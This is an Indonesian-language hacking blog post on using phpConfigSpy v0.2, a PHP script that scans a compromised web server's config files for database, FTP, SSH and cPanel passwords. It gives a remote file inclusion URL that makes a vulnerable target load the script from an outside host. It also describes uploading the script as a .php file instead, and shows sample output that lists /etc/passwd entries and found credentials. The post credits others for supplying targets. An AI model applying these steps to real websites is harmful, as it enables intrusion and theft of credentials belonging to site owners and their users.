Menggunakan phpConfigSpy v0.2 pada target RFI

Menggunakan phpConfigSpy v0.2 pada target RFI

phpConfigSpy v0.2 Merupakan sebuah code php yang di gunakan untuk melihat file :

config.php
config.inc.php
conf.php
settings.php
setup.php
dbconf.php
dbconfig.php
db.inc.php
dbconnect.php
connect.php
index.php
common.php
config_global.php
db.php
connect.inc.php
dbconnect.inc.php

Dan untuk membaca isi file-file tersebut, untuk mendapatkan username dan password untuk login. Baik untuk Login ftp, ssh, Cpanel dan mysql.

Apabila phpConfigSpy mendapatkan sebuah file di atas atau lebih akan menghasilkan :

[+] Founded 53 entrys in /etc/passwd
[+] Founded 53 readable public_html directories
[~] Searching for passwords in config files…

[+] /home/chokbd/public_html/phpsql/config.inc.php
mysql/user
seperti pada gambar di bawah ini :
Menggunakan phpConfigSpy v0.2
Ada 2 cara untuk menggunakan phpConfigSpy yaitu :

1. Injectkan Langsung.
Dimana inject-kan langsung ini seperti melakukan inject-kan biasa seperti halnya meload botphp ataupun Pbot.

www.target-di.biz/aframe.php?page=http:/inject-an-di.biz/php/phpspy.txt??

Target Vuln/Bug Inject-kan

2. Upload phpConfigSpy di target.
Langsung saja upload file phpConfigSpy di target. asalkan filenya ber-ekstensi .php langsung dapat di gunakan dengan langsung membuka file yang di upload tadi.
Tinggal membuka di browser ww.target-di.biz/files/spy.php
bila sudah di buka tinggal tunggu prosesnya saja, dan lihat hasilnya.

Bila phpConfigSpy masih ber-ekstense .txt di ubah menjadi .php. dan di buka dengan browser seperti cara di atas. file yang bernama spy.php adalah file phpConfigSpy.

untuk source code nya dapat di lihat di :
Source Code phpConfigSpy v0.2

Makasih Banget untuk kk :
noname untuk source code dan penjelasannya ^_^
DonaTTeLo untuk target dan injekannya

By : Shinchi di http://www.samada.wordpress.com dengan Nama file asli :
Menggunakan phpConfigSpy v0.2

Leave a comment